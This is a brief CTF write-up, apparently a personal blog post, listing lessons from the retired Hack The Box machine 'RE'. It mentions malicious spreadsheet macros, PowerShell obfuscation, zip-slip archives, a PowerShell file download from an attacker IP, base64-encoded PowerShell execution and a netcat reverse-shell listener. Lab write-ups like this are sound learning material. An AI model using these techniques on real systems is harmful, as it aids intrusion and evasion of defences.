---
title: RE HTB
date: '2020-02-01 23:00:00'
categories: ["htb"]
---

# Takeaways from RE box

The Re box created from [0xdf](https://0xdf.gitlab.io/) was retired later this day. I did solve the box *after* it was retired so now I am going to show you some *key* things I learned from this box. A list of these is here:

* `Sometimes smbmap may throw false postivies. I always try to use smbclient.`

* `libreoffice calc also support macros, we can run malicious command from these docs.`

* `We can use` [Invoke-Obfuscation](https://github.com/danielbohannon/Invoke-Obfuscation for powershell obfuscation)` for powershell obfuscation`

* `The famous yara rules I saw on twitter but never took the chance to search it. Yara rules are basically a way to search for some common strings you provide to yara in order to identify malicious programs/files.`

* `I almost forgot about .ace files and winrar, and zipslip. This exploit was used on the box to go from one user to another. We had to create a malicious .zip file which contains inside a malicious file with a path traversal as filename.`

* [UPX](https://upx.github.io/)` I used this tool to make chisel.exe a little bit smaller. I have seen this from ippsec`

* `We can download file from powershell by using iwr -uri ip/file -outfile filename.evil`

* `We can run base64 encoded powershell commands but we need to use convert the strings to utf16 little endian using the command: iconv -t utf-16le and then pipe it to base64. After we can run the command by using powershell -encodedcommand base64string== `

* `Use rlwrap -nc -nvlp 7979 to have working arrow keys on windows.`

* [WinPeas](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS)
`Like LinEnum but for windows.`

* 

Thats all. I didn't do the uninteded way. If you want to learn more goto 0xdf blog or see ippsec videos.